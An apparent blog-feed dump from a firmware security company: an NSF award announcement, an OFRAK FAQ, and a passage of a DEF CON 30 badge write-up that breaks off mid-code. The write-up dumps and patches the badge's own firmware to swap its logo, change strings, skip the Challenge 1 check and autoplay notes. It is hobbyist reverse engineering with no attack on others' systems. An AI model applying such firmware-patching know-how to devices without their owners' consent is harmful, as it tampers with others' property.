Red Balloon Security Wins 2022 NSF Convergence Accelerator Award for Proposed Improvements to 5G Cybersecurity Through Hardening of Embedded Devices

We’re one of 16 teams chosen to enhance the secure operation of 5G infrastructure.

Red Balloon Security has received a $682,000 award from the National Science Foundation’s Convergence Accelerator Program, which includes participation in Phase 1 of the program’s Track G: Securely Operating Through 5G Infrastructure. The Department of Defense is aligned with the NSF Convergence Accelerator through this 5G initiative, “Operate Through,” and is a funding partner of this track topic.

 

 

RBS’s Phase I project, Building Resilient and Secure 5G Systems (BRASS), will leverage a use-inspired convergence research approach to ensure 5G devices are outfitted with detection and prevention capabilities that are effective against large classes of firmware vulnerabilities and cyberattacks, including attacks that exploit zero-day vulnerabilities. The company’s automated firmware hardening and runtime protection embedded solutions will help 5G infrastructure and mobile device managers secure devices in the context of cooperative, non-cooperative, and tailored 5G networks.

 

“Low-level firmware of 5G devices needs protection against increasing threats,” says Dr. Aleksey Nogin, Head of Research at Red Balloon, and BRASS’s Co-PI and PM. “Most contain a number of different processors, each running complex and potentially vulnerable firmware. BRASS will expand on our methods to automate and accelerate the integration of passive and active firmware protections for 5G devices in critical and vulnerable environments.”

 

5G infrastructure involves multiple novel technologies and interfaces that increase its complexity relative to existing 4G networks and amplify potential security issues. Red Balloon’s host-based firmware detection and attack prevention technology can provide a robust layer of security in networks that are still evolving, or where security capabilities are not a primary consideration.

 

The National Science Foundation (NSF) is building upon research and discovery to accelerate use-inspired research into practice. The Convergence Accelerator program is an NSF capability designed to address national-scale societal challenges. Its 2022 cohort on Track G, Phase 1, will undertake a nine-month planning effort to develop initial concepts, identify new team members, participate in the innovation curriculum, and develop an initial prototype.

 

At the end of Phase 1, each team will participate in a formal pitch and proposal evaluation. Selected teams from Phase 1 will proceed to Phase 2, with potential funding of up to $5 million for 24 months.

 

“The Convergence Accelerator is a relatively young NSF program, but our unique program model is focused on delivering tangible solutions that have a positive impact to our nation and the American people,” said Douglas Maughan, Head of the NSF Convergence Accelerator program. “We are excited to be partnering with the Department of Defense’s Office of the Under Secretary of Defense for Research and Engineering to accelerate solutions to support DoD’s 5G mission.”

 

Aleksey Nogin feels RBS can deliver solutions with nation-wide implications. “The combination of deep research capabilities and a track record of commercial applications for our core technology, Symbiote, puts us in a unique position. We have a great deal of experience working with government agencies that depend on reliable, cutting-edge solutions, as well as a method for scaling our technology to meet the needs of the marketplace.”

About Track G: Securely Operating Through 5G Infrastructure

The Convergence Accelerator’s Track G consists of three sub-focuses that are distinguished by the degree of cooperation expected from the indigenous 5G network:

Non-Cooperative Networks:

Assumes no cooperation from the indigenous 5G network. This sub-track seeks capabilities where end devices can operate on untrusted 5G infrastructure found in the field, and seamlessly connect with devices on external networks while leveraging zero-trust principles.

Cooperative Networks:

Assumes the indigenous 5G network will work with the military, government, or critical infrastructure operator, but any cooperation must be operationally reasonable and beneficial to the indigenous network.

Tailored Networks:

Tailors the 5G network to meet the military, government, or critical infrastructure operator’s requirements. This sub-track seeks solutions to operate through 5G networks with custom and specifically designed implementations.

To learn more about Red Balloon Security’s offerings, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/feed/ 0 7597
OFRAK: A BOON TO THE CYBER SECURITY COMMUNITY, EMBEDDED DEVICE MANUFACTURERS, AND END USERS, IN 7 QUESTIONS https://redballoonsecurity.com/ofrak-a-boon-to-the-security/ https://redballoonsecurity.com/ofrak-a-boon-to-the-security/#respond Wed, 31 Aug 2022 22:01:07 +0000 https://redballoonsecurity.com/?p=7465

OFRAK: A BOON TO THE CYBER SECURITY COMMUNITY, EMBEDDED DEVICE MANUFACTURERS, AND END USERS, IN 7 QUESTIONS

The release of RBS’s firmware reverse engineering tool is consistent with government and industry calls for higher security standards.

For over a decade, Red Balloon Security has used FRAK – the Firmware Reverse Analysis Konsole – in deployments with the US government, commercial engagements with original equipment manufacturers (OEMs), and to conduct independent research on device firmware. It has proven to be a multi-faceted tool that RBS engineers rely on to make sense of, harden, and repack firmware binaries that are essential to the operation of all types of embedded devices, including satellite control terminals, PLCs, automotive ECUs, building control and safety equipment, and ordinary commercial products, such as drones or monitors.

 

But from its inception, FRAK was meant to be a tool for the security community at large.

 

RBS CEO and founder Dr. Ang Cui originally created FRAK in 2012. “At the time, I thought, here’s a framework that would help researchers move embedded security forward,” he explained recently. “I thought the security community and engineers with all the leading device manufacturers should have it at their disposal.”

 

In August 2022, after numerous refinements, many of them honed through engagements with DARPA, DHA, and DoD, Red Balloon made FRAK – OFRAK, in its current iteration – available to the greater security community.

 

Red Balloon is dedicated to making firmware easier to understand, easier to improve and easier to secure. We encourage engineers and other technical people to visit https://ofrak.com for a deeper understanding of OFRAK’s functionality and licensing options.

 

Here are seven answers to more general questions about what OFRAK is, what it does, and why Red Balloon is so excited about this release.

1. What, exactly, can engineers do with OFRAK?

OFRAK is a binary analysis and modification platform that combines the ability to:

 

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

 

OFRAK supports a range of embedded firmware file formats beyond user-space executables, including:

 

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

 

Red Balloon frequently uses OFRAK for firmware unpacking, analysis, modification, and repacking, and maintains it with those purposes in mind.

 

Both engineers working for device manufacturers and security researchers tasked with discovering or remediating device vulnerabilities can use OFRAK to both analyze how a device’s firmware operates and modify it.

“[OFRAK] is a valuable tool that significantly facilitated security researchers’ work in the field of applied embedded security. I am very happy to see more of this project being made available to such a wide audience through open source.”

2. How does OFRAK actually benefit software engineers, and those training to enter the field?

Essentially, OFRAK allows software engineers to do their work with greater speed and efficiency, freeing them up to tackle harder engineering problems.

 

For less-experienced users, OFRAK is an excellent platform for learning about binaries and embedded firmware in general.

 

RBS uses OFRAK to unpack firmware and inject its firmware hardening and runtime protection solutions, such as Symbiote. 

3. Is OFRAK the only publicly available tool that does this?

No. Many firmware unpacking and analysis tools already exist.  One of the most popular publicly-available tools, Ghidra, was developed and released by the NSA in 2019.

4. How is OFRAK different from other software engineering platforms?

Most binary analysis tools work best when analyzing common executable file formats or binary blobs, but struggle with common firmware formats or with navigating nested firmware files. OFRAK’s first-class support for embedded firmware allows a user to unpack and analyze an ELF buried within an XZ-compressed CPIO filesystem inside of an ISO, modify the ELF, and then repack the entire tree.
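As a concrete (if simplified) sketch of that unpack-modify-repack flow, here is what it can look like with OFRAK’s Python API as it appears in the badge write-up later in this feed; the firmware path, the version strings, and the exact import paths are illustrative assumptions and may vary across OFRAK versions:

				
					import logging

from ofrak import OFRAK, OFRAKContext
from ofrak.core.strings import StringFindReplaceConfig, StringFindReplaceModifier


async def patch_firmware(ofrak_context: OFRAKContext):
    # Load a (hypothetical) firmware image as an OFRAK root resource
    root = await ofrak_context.create_root_resource_from_file("firmware.img")
    # Recursively unpack nested formats (filesystems, archives, kernels, ...)
    await root.unpack_recursively()
    # Apply a simple modification; any unpacker/analyzer/modifier could run here
    await root.run(
        StringFindReplaceModifier,
        StringFindReplaceConfig("v1.0.0", "v1.0.1"),
    )
    # Repack the entire tree and write the patched image back out
    await root.pack_recursively()
    await root.flush_to_disk("firmware_patched.img")


OFRAK(logging.INFO).run(patch_firmware)
				
			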

 

Furthermore, OFRAK provides a unified interface for interacting with other powerful tools. For example, OFRAK provides a common disassembler interface that allows engineers to switch between supported disassemblers (angr, Binary Ninja, Capstone, Ghidra, IDA Pro). Similarly, the OFRAK PatchMaker provides a common interface for interacting with various assemblers, compilers and toolchains. These common interfaces enable engineers to easily switch between disassemblers, assemblers, and toolchains without having to rewrite their business logic. This flexibility helps save money when the constraints of a project require using a particular tool.

“Oftentimes, it’s cost prohibitive for organizations to hire reverse engineers with specialized skills to patch embedded devices. Automating the application of a fix turns out to be a hard computer science problem with fundamental research challenges. These challenges must be supported with new classes of modular, community-building, research-enabling tools such as OFRAK.”

5. Will OFRAK affect the functionality of the firmware’s host device?

Not if it’s being used responsibly. This is where OFRAK’s modular component design – which breaks unpacking, modification, and packing into discrete steps – is important. OFRAK’s component architecture allows engineers to chain together tested and verified unpackers, modifiers, and packers in a safe way. This reduces the likelihood of introducing unintended changes into a firmware binary.

6. OK, but is OFRAK actually for experienced engineers?

OFRAK is for any serious student or practitioner of reverse engineering. Every reverse engineer begins as a student or as a curious self-starter. RBS is committed to a process that will train the next generation of engineers. This is why OFRAK is free to individuals who are learning in an academic program or on their own.

7. So, is OFRAK open-sourced?

Technically, no. OFRAK is source-available, but not open source. The code in OFRAK’s GitHub repository comes with the OFRAK Community License, which is intended for educational use, personal development, or just having fun. Users interested in using OFRAK for commercial purposes can learn more at ofrak.com/license. Free 6-month trials of the OFRAK Pro License are available for a limited time.

To learn more about Red Balloon Security’s offerings, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/ofrak-a-boon-to-the-security/feed/ 0 7465
DEF CON 30 Badge Fun with OFRAK https://redballoonsecurity.com/def-con-30-badge-fun-with-ofrak/ Wed, 24 Aug 2022 18:01:28 +0000 https://redballoonsecurity.com/?p=7215

DEF CON 30 Badge Fun with OFRAK

The TL;DR? We used OFRAK to rewrite the badge firmware so that it auto-plays the solution for Challenge 1.

Est. read time: 20 min

The code referenced in this writeup can be found here.

 

 

DEF CON 30 just ended, and the badge this year was awesome. It included a playable synthesizer with a few instrument presets, as well as buttons, a screen, and a small speaker. Everything on the badge was driven by a Raspberry Pi Pico. As usual, the badge also had an associated reverse engineering challenge.

 

 

Several of us from Red Balloon Security attended and manned booths in the Aerospace Village and Car Hacking Village. Many of our demos were based on OFRAK, which we released publicly at DEF CON 30. Since OFRAK is a binary reverse engineering and modification platform, it naturally became our tool of choice for badge firmware modification.

 

 

This post walks through using OFRAK to modify the DEF CON 30 Badge firmware in fun and exciting ways. We are unabashedly building off of this great write-up. @reteps, we owe you a beer! (Or a ginger ale, since it seems like you may not be old enough to drink just yet.)

 

This write-up is long, so feel free to skip ahead to the parts that interest you:

Table of Contents

  • Set up OFRAK
  • Insert logo with OFRAK GUI
  • Change some strings
  • Press any key to win Challenge 1
  • Autoplay Notes (Piano Player) to win Challenge 1
  • Closing Thoughts

Set up OFRAK

To walk through this writeup with us, you will need to install picotool and ofrak. Run these steps in the background while you read the rest of this document.

For this writeup, we used the redballoonsecurity/ofrak/ghidra Docker image.

  1. Make sure you have Git LFS set up.

    which git-lfs || sudo apt install git-lfs || brew install git-lfs
    git lfs install
  2. Clone OFRAK.

    git clone https://github.com/redballoonsecurity/ofrak.git
    cd ofrak
  3. Install Docker.

  4. Build an OFRAK Docker image with Ghidra. This will take several minutes the first time, but should be quick to rebuild later on. Continue reading and come back when it is finished!

    # Requires pip
    python3 -m pip install --upgrade PyYAML
    
    DOCKER_BUILDKIT=1 \
    python3 build_image.py --config ./ofrak-ghidra.yml --base --finish

    Check it is installed by looking for redballoonsecurity/ofrak/ghidra near the top of the output of the following command.

    docker images
  5. Run an OFRAK Docker container. These instructions have more information about running OFRAK interactively.

    mkdir --parents ~/dc30_badge
    
    docker run \
      --rm \
      --detach \
      --hostname ofrak \
      --name ofrak \
      --interactive \
      --tty \
      --publish 80:80 \
      --volume ~/dc30_badge:/badge \
      redballoonsecurity/ofrak/ghidra:latest
  6. Check that it works by going to http://localhost. You should see the OFRAK GUI there.

We use picotool to export the firmware image.

  1. Install the dependencies. For example, on Ubuntu:

    sudo apt install build-essential pkg-config libusb-1.0-0-dev cmake make
    
    git clone https://github.com/raspberrypi/pico-sdk.git
    git clone https://github.com/raspberrypi/picotool.git
  2. Build picotool.

    pushd picotool
    mkdir --parents build
    cd build
    PICO_SDK_PATH=../../pico-sdk cmake ..
    make -j
    sudo cp picotool /usr/local/bin/
    popd

You can now use picotool to export the firmware image from the device. To do this, the badge must be in BOOTSEL. To put the badge in BOOTSEL, hold down the badge’s down button while powering the device, or short the J1 pins on the back with a jumper wire. You can now connect the device to your computer over micro USB.

If you have done this correctly, running picotool should give the following output:

				
					$ sudo picotool info -a
Program Information
 name:          blink
 description:   DEF CON 30 Badge
 binary start:  0x10000000
 binary end:    0x100177cc

Fixed Pin Information
 0:   UART0 TX
 1:   UART0 RX
 25:  LED

Build Information
 sdk version:       1.3.0
 pico_board:        pico
 boot2_name:        boot2_w25q080
 build date:        Jul 17 2022
 build attributes:  Debug

Device Information
 flash size:   2048K
 ROM version:  3
				
			

You can now dump the badge firmware as a raw binary file, badge_fw.bin, using the following command:

				
					mkdir --parents ~/dc30_badge
sudo picotool save -a -t bin ~/dc30_badge/badge_fw.bin
				
			

Insert logo with OFRAK GUI

First things first – let’s replace the DEF CON logo that appears when the badge is powered on with an OFRAK logo!

1. Load the image into the OFRAK GUI.

2. We know from the reteps writeup that the DEF CON logo is at offset 0x13d24, so we can use the “Carve Child” feature in the OFRAK GUI to unpack it as a separate resource.

 

Carve from offset 0x13d24 with a size of 80 by 64 pixels, each of which is stored in a single bit (so divide by 8 to get the number of bytes).

3. Download the child and verify that it’s the correct range by loading it in GNU Image Manipulation Program (GIMP).

Looks good!

 

4. Download this pre-built OFRAK Logo from here, or expand more information about building a custom image below.

  1. For making a custom image, first, create a new canvas and load your image as a layer resized for the canvas.


  2. Load your image, and resize it and invert the colors if necessary. The OFRAK Logo is a great candidate image.


  3. Convert the image to 1-bit color depth with dithering. (For more about dithering, check out this article.)




  4. Merge all the layers into one by right-clicking in the layers pane on the left.




  5. Export the image with Ctrl+Shift+E (Cmd on Mac), or use File > Export As.... Pick PNG.



  6. Convert the PNG to raw 1-bit data with ImageMagick, based on the instructions here.

    # Install ImageMagick if you don't have it
    which convert || sudo apt install imagemagick || brew install imagemagick
    
    # Convert the image
    convert myimage.png -depth 1 GRAY:shroomscreen.bin
    
    # Verify that it is 640 bytes
    wc -c shroomscreen.bin

5. Use the OFRAK GUI “Replace” feature to replace the data.

6. Pack the whole thing back up.

7. Download the resulting firmware image and flash it onto the device.

				
					cp "$(ls -rt ~/Downloads | tail -n 1)" ~/dc30_badge/ofrakked.bin
sudo picotool load ~/dc30_badge/ofrakked.bin

				
			

8. Verify that it works by booting up the badge.

Looks good!

We can now automate this step in future firmware mods by using the following Python function:

				
					async def ofrak_the_logo(resource: Resource):
      """
      Replace the DEF CON logo with OFRAK!
      """
      logo_offset = 0x13d24
      ofrak_logo_path = "./shroomscreen.data"
      with open(ofrak_logo_path, "rb") as f:
          ofrak_logo_bytes = f.read()
      resource.queue_patch(Range.from_size(logo_offset, len(ofrak_logo_bytes)), ofrak_logo_bytes)
      await resource.save()
				
			

Change some strings

It is easy to use OFRAK to change strings within the badge firmware. The function ofrak_the_strings (listed below) changes the “Play” button on the badge’s menu to display “OFRAK!” and hijacks the credits, giving credit to OFRAK mascots (“mushroom”, “caterpillar”) and “rbs.”

				
					async def ofrak_the_strings(resource: Resource):
        """
        Change Play menu to OFRAK!

        Update credits to give credit where due
        """
        # First, let's overwrite Play with "OFRAK!"
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "Play",
                "OFRAK!",
                True,
                True
            )
        )
        # Let's overwrite credits with OFRAK animal names
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "ktjgeekmom",
                "mushroom",
                True,
                False
            )
        )
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "compukidmike",
                "caterpillar",
                True,
                False
            )
        )
        await resource.run(
            StringFindReplaceModifier,
            StringFindReplaceConfig(
                "redactd",
                "rbs",
                True,
                False
            )
        )
				
			

Press any key to win Challenge 1

OK, now on to Challenge 1! For those of you who didn’t participate in BadgeCon: You win Challenge 1 on the DEF CON Badge if you play a melody from Edvard Grieg’s Peer Gynt.

 

Peer Gynt is nice, but some of us can’t play the piano (or are too lazy). We want to win Challenge 1 without any musical skills/effort.

 

The reteps writeup points us to a two-byte binary patch that does just that. The ofrak_challenge_one function below patches the badge firmware such that pressing any key wins Challenge 1!

				
					async def ofrak_challenge_one(resource: Resource):
      """
      Win challenge 1 by pressing any key!
      """
      check_challenge_address = 0x10002DF0
      win_address = 0x10002E20
      jump_asm = f"b {hex(win_address)}"
      jump_bytes = await assembler_service.assemble(
          jump_asm, check_challenge_address + 4, ARCH_INFO, InstructionSetMode.THUMB
      )

      await resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig([(0x10002DF0 + 4, jump_bytes)]),
      )
				
			

You’re welcome.

Autoplay Notes (Piano Player) to win Challenge 1

Jumping right to the win condition is fun and all, but isn’t half the fun of the badge that it makes sounds? What if we could just have it… make sounds? Sounds that happen to make us win?

 

The goal of this section is to use OFRAK to patch the badge firmware into “Player Piano” mode: When you start Challenge 1, the badge autoplays Peer Gynt for you and you win. This is not too complicated, but it requires us to put on our Reverse Engineer hats and dig deeper into the firmware.

 

Step 1: Reverse Engineering

The first step was to pull the firmware and throw it into Ghidra. Luckily, we didn’t have to start from scratch.

 

Step 0: Plagiarize Survey the Literature

Shoutout (again) to the reteps writeup, which was a great starting point. If he shared his Ghidra project, we didn’t see it, but in his writeup we could see one important function labeled and with a full address! What he called z_add_new_note_and_check at 0x10002df0, we called check_challenge, but it does the same thing either way. That was essentially our starting point, from which all other analysis stemmed.

Step 1v2: Reverse Engineering

Our first approach was looking at code xrefs to check_challenge since A) that was our foothold and we did not have any other good starting points, and B) the latest note played was passed to this function, so it seemed to make sense to trace that data flow and find out how the latest note played is read. Then, in theory, we could write a new note there programmatically. The immediate problem was that most usages of check_challenge were in a function we affectionately called big_chungus because it was large and hard to understand. The decompilation looked like this:

Which was essentially unusable except in very local instances.

 

The next approach we took was looking at strings. We quickly found some interesting strings we had seen on the screen, so we followed those references and found a number of functions related to drawing pixels (below screenshot shows them after they were labeled):

This led to the functions that drew each of the menus, which gave us a good idea of the state machine that the firmware uses. Throughout the process, we used OFRAK to experiment with different hypotheses by injecting bits of assembly to poke at addresses. For example:

				
					async def overwrite_state_pointers(resource):
    # Effect: main menu does not change image when i move to different options
    # (they are still selected, as we can click through them)
    new_state_pointer_bytes = struct.pack("<i", 0x1000544c)
    await resource.run(
        BinaryInjectorModifier,
        BinaryInjectorModifierConfig(
            [
                (0x1000e1a0, new_state_pointer_bytes),
                (0x1000e1a4, new_state_pointer_bytes),
                (0x1000e1a8, new_state_pointer_bytes),
                (0x1000e1ac, new_state_pointer_bytes),
                (0x1000e1b0, new_state_pointer_bytes),
            ]
        ),
    )
    
    
async def main(ofrak_context):
    root_resource = await ofrak_context.create_root_resource_from_file(BADGE_FW)
    
    root_resource.add_tag(Program)
    root_resource.add_attributes(arch_info)
    root_resource.add_view(MemoryRegion(START_VM_ADDRESS, FIRMWARE_SIZE))

    await root_resource.save()

    await overwrite_state_pointers(root_resource)
    
    # And other experiments...

    await root_resource.save()
    await root_resource.flush_to_disk(OUTPUT_FILE)
				
			

This helped us to confirm or reject these hypotheses. It was also just fun to change the behavior. We used this function to change all of the keys’ associated light colors to green, since the code for that is all in a big regularly-patterned block and we could iterate over it at constant offsets:

				
					async def set_all_key_lights(resource, rgb):
      first_color_load_vaddr = 0x10004cf0
      color_loads_offset = 0xe

      set_red_instr = f"movs r0, #0x{rgb[0]:x}"
      set_green_instr = f"movs r1, #0x{rgb[1]:x}"
      set_blue_instr = f"movs r2, #0x{rgb[2]:x}"

      mc = await assembler_service.assemble(
          "\n".join([set_blue_instr, set_green_instr, set_red_instr]),
          first_color_load_vaddr,
          arch_info,
          InstructionSetMode.THUMB,
      )
      
      await resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig(
              [
                  (color_load_vaddr, mc)
                  for color_load_vaddr in range(first_color_load_vaddr, 0x10004dc2, color_loads_offset)
              ]
          ),
      )
				
			

After mucking around for a while, we were not completely sure we had found the “source” of the notes. We had some ideas, though they would require more complex experiments, which would be cumbersome to write in assembly. At this point, we decided to set up the OFRAK PatchMaker for the badge firmware.

Step 2: PatchMaker

The PatchMaker is a Python package for building code patch blobs from source and injecting them into an executable OFRAK resource. In this case, we wanted to be able to “mod” the badge firmware by just writing out some C code with full access to the existing functions and data already in the device.

 

The first step is to set up the toolchain configuration:

				
					
TOOLCHAIN_CONFIG = ToolchainConfig(
    file_format=BinFileType.ELF,
    force_inlines=False,
    relocatable=False,
    no_std_lib=True,
    no_jump_tables=True,
    no_bss_section=True,
    compiler_optimization_level=CompilerOptimizationLevel.SPACE,
    check_overlap=True,
)
TOOLCHAIN_VERSION = ToolchainVersion.GNU_ARM_NONE_EABI_10_2_1
				
			

This is pretty standard stuff for C-patching an existing firmware. We decided to use the PatchFromSourceModifier to do the actual patching, as it hides some of the nitty-gritty of building a patch (though it consequently has fewer options than going through the core PatchMaker API).

The next step is to define the symbols that can be used from the patch source code. These need to be exposed to PatchMaker by adding LinkableSymbol data structures to the existing Program:

				
					LINKABLE_SYMBOLS = [
    # Existing variables in binary
    LinkableSymbol(0x20026eea, "notes_held_bitmap", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x200019d8, "octave", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x20001991, "most_recent_note_played", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x200063d8, "notes_played", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),
    LinkableSymbol(0x20026f01, "instrument", LinkableSymbolType.RW_DATA, InstructionSetMode.NONE),

    # Existing functions in binary
    LinkableSymbol(0x10005074, "draw_rect_white", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),
    LinkableSymbol(0x10004fc4, "write_character", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),
    LinkableSymbol(0x1000503c, "write_text", LinkableSymbolType.FUNC, InstructionSetMode.THUMB),

]

# ... Then later add to resource with:

await resource.run(
        UpdateLinkableSymbolsModifier,
        UpdateLinkableSymbolsModifierConfig(tuple(LINKABLE_SYMBOLS)),
    )
    

				
			

And they need to be exposed to the C code by declarations, as one might normally see in a header:

				
					#include <stdint.h>

extern uint16_t notes_held_bitmap;
extern uint8_t octave;
extern uint8_t most_recent_note_played;
extern uint8_t notes_played[];
extern uint8_t instrument;

extern void draw_rect_white(unsigned int x, unsigned int y, unsigned int x_end, unsigned int y_end);
extern void write_character(char c, int x, int y, int color); // 0=white, 1=black
extern void write_text(const char* str, int x, int y, int color); // 0=white, 1=black
				
			

Then we could write some C code referencing those; no spoilers though, we’ll show that code later! To actually build it, we create an empty root resource to hold the source code and run PatchFromSourceModifier:

				
					async def patch_in_function(ofrak_context, resource: Resource):
      """
      Patch in the auto-player that plays the sequence to solve challenge 1.
      """
      # Not strictly necessary, but nice to really clear all "free space"
      await overwrite_draw_volume_info(resource)

      source_bundle_r = await ofrak_context.create_root_resource(
          "", b"", tags=(SourceBundle,)
      )
      source_bundle: SourceBundle = await source_bundle_r.view_as(SourceBundle)
      with open(PATCH_SOURCE, "r") as f:
          await source_bundle.add_source_file(f.read(), PATCH_SOURCE)

      await resource.run(
          UpdateLinkableSymbolsModifier,
          UpdateLinkableSymbolsModifierConfig(tuple(LINKABLE_SYMBOLS)),
      )

      await resource.run(
          PatchFromSourceModifier,
          PatchFromSourceModifierConfig(
              source_bundle_r.get_id(),
              {
                  PATCH_SOURCE: (
                      Segment(
                          ".text",
                          DRAW_VOLUME_RANGE.start,
                          0,
                          False,
                          DRAW_VOLUME_RANGE.length() - 0x50,
                          MemoryPermissions.RX,
                      ),
                      Segment(
                          ".rodata",
                          DRAW_VOLUME_RANGE.end - 0x50,
                          0,
                          False,
                          0x50,
                          MemoryPermissions.R,
                      ),
                  ),
              },
              TOOLCHAIN_CONFIG,
              TOOLCHAIN_VERSION,
          ),
      )
				
			

The source bundle resource ID, TOOLCHAIN_CONFIG, and TOOLCHAIN_VERSION were already explained, but what about the Segments?

 

Step 3: Free Space & Segments

 

In order to inject code, we obviously need a location to inject it into. There are three options for how to obtain this:

 

  1. Find some unused space in the binary.
  2. Enlarge/extend the firmware binary so more bytes are loaded into memory.
  3. Replace something that already exists in the binary.

 

These are roughly ordered from “best” to “worst.” Ideally, we want to change as little as possible in the binary. In this situation, though, we were limited to the third option:

 

  1. We did not have complete knowledge of the binary and could not say with 100% confidence that some part was unused (this is usually the case).
  2. We did not yet have an OFRAK packer/unpacker for uf2, the file format the binary was in.

 

So the next task was to choose something to overwrite. We found the function that drew the little volume slider on the side, and this seemed a good choice because:

 

  • It would free up a decent amount of space (over 256 bytes to drop THUMB code in).
  • It was called often and consistently (alongside other screen-updating code).
  • Removing it would give us some real estate on the right edge of the screen to write/draw new stuff to!

 

We verified that this would have no ill effects by gutting the contents of the function with nop instructions:

				
					async def overwrite_draw_volume_info(resource):
      """
      Creates free space! But you no longer get to see the current volume and the nice arrows
      telling you which way to adjust it.
      """

      return_instruction = await assembler_service.assemble(
          "mov pc, lr",
          DRAW_VOLUME_RANGE.end - 2,
          ARCH_INFO,
          InstructionSetMode.THUMB,
      )

      nop_sled = await assembler_service.assemble(
          "\n".join(
              ["nop"] * int((DRAW_VOLUME_RANGE.length() - len(return_instruction)) / 2)
          ),
          DRAW_VOLUME_RANGE.start,
          ARCH_INFO,
          InstructionSetMode.THUMB,
      )

      final_mc = nop_sled + return_instruction
      assert len(final_mc) == DRAW_VOLUME_RANGE.length()

      await resource.run(
          BinaryInjectorModifier,
          BinaryInjectorModifierConfig([(DRAW_VOLUME_RANGE.start, final_mc)]),
      )
				
			

If we are just patching in some compiled C patch over the existing code, NOPing it out first isn’t strictly necessary, but it is a good sanity check that removing the function is probably fine. It also verifies the function does what we think it does: The volume slider is gone!

With our target address picked out, we defined the PatchMaker Segments where our compiled code and data would be inserted:

				
					Segment(
    ".text",
    DRAW_VOLUME_RANGE.start,
    0,
    False,
    DRAW_VOLUME_RANGE.length() - 0x50,
    MemoryPermissions.RX,
),
Segment(
    ".rodata",
    DRAW_VOLUME_RANGE.end - 0x50,
    0,
    False,
    0x50,
    MemoryPermissions.R,
),

				
			

The first is for the code, and the second is a healthy allocation for read-only data, like constants and strings.

At this point we were ready to start writing some C.

Step 4: The Payload

We wrote a number of experiments in C code, experimenting with various memory addresses and functions we were investigating. C is brilliant because it is so much nicer to work in than assembly, but just as unsafe. One trick we used liberally was casting memory locations to whatever pointer type we wanted: this allowed us to quickly iterate and peek/poke addresses that we thought contained interesting data. Here are some snippets from our experiments:

				
					char instrument = *((char*) 0x20026f01);
write_character(instrument + 0x30 , 0x70, 12, 0);

char most_recent_c = most_recent_note_played;  // is an index form, not the actual note string
write_character(most_recent_c, 0x70, 22, 0);

write_character(notes_played[0x2d - 1], 0x7a, 22, 0);


int button_held = *((int*) 0xd0000004);
// Just copying the Ghidra decomp for these comparisons
// It's easier than thinking about which bit is being checked
if (-1 < (button_held << 0x10)) {
    write_character('U', 0x70, 22, 0);
}
if (-1 < (button_held << 0xf)) {
    write_character('D', 0x70, 22, 0);
}
else if (-1 < (button_held << 0xe)) {
    write_character('L', 0x70, 22, 0);
}
else if (-1 < (button_held << 0xd)) {
    write_character('R', 0x70, 22, 0);
}

				
			

This writes out the index of the currently selected instrument, and below that draws the two most recently played notes.

The characters drawn (“@”, “<“) representing the notes just happen to be ASCII; they are uint8_t indexes into what is essentially a long array of all possible notes in all octaves, 84 values in total. G# in the lowest octave is the first visible “character” at 0x20, i.e. “ ” (space); for anything below this, the draw_character function just draws a white rectangle. B in the highest octave is the highest byte, 0x6B (“k”). Here “@” and “<” mean the most recent notes played were E and C in the 4th octave.

 

Recall that write_character is a function analyzed from the existing binary, and we can call it and link against it like writing normal C code! This is the power of PatchMaker.

 

At this point we had a good loop: Follow some code and/or data in Ghidra for a while until we think we understand it, then write a C patch to use that knowledge to test our theory. After a little bit, we had found a bitmap at 0x20026eea that seemed to store the info about which keys were currently held; some experiments confirmed this. At this point, we had all the information we needed to write a “Player Piano” for the badge!

 

Step 5: Forward Engineering

 

After all the reverse engineering, there were a few “forward” engineering challenges to consider, so we’ll just rapid fire through them:

 

Timing

We wanted the notes to be audible one after the other, so that meant we had to time them. We didn’t find any timing functions, and probably would not have “trusted” them even if we had. We decided to just use a counter incremented each time our function was called (like a C static local variable) and play/advance notes according to that. This meant we needed some R/W space, which we implemented quick and dirty by finding some free scratch space and defining pointers to it as LinkableSymbols.

 

We got the addresses by going to the memory segment we had defined in Ghidra for in-memory RW data, and finding the address at which we stopped seeing references. Luckily this was 0x20026f04, not near an obvious page-end boundary, so we felt reasonably confident we could read/write to it as much as we wanted. Then we defined the LinkableSymbols for it:

				
					FREE_SCRATCH_SPACE = 0x20026f04
...

# Added these to the UpdateLinkableSymbolsModifierConfig shown earlier:

LinkableSymbol(FREE_SCRATCH_SPACE, "counter", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),
LinkableSymbol(FREE_SCRATCH_SPACE + 0x8, "seq_i", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),
LinkableSymbol(FREE_SCRATCH_SPACE + 0x10, "state", LinkableSymbolType.RW_DATA,InstructionSetMode.NONE),

				
			

In C we could use those as extern r/w variables:

				
					extern int counter;
extern int seq_i;
extern int state;

...

counter += 1;
    
    
if (counter >= NOTE_PERIOD) {
    seq_i += 1;
    if (seq_i >= (SEQUENCE_LENGTH + REST_COUNT)){
        seq_i = 0;
    }

    counter = 0;
}
else if (counter >= (NOTE_PERIOD - NOTE_HELD_T) && seq_i < SEQUENCE_LENGTH) {
    // write next note here
}

				
			

Storing and writing the sequence

Since the target we needed to write notes to was a bitmap, where each bit is a single note, it made sense to define each note as the bit it maps to in the bitmap. This could be represented either as a bit index (e.g. 0x3 means “third bit”) or as a bit mask (e.g. 0x8 means “third bit” because the third bit is set). In the end we chose bit index because it was more compact, requiring only one byte per note for the 12 notes (plus 3 samples).

				
					typedef enum {
    C = 0,
    C_SHARP = 1,
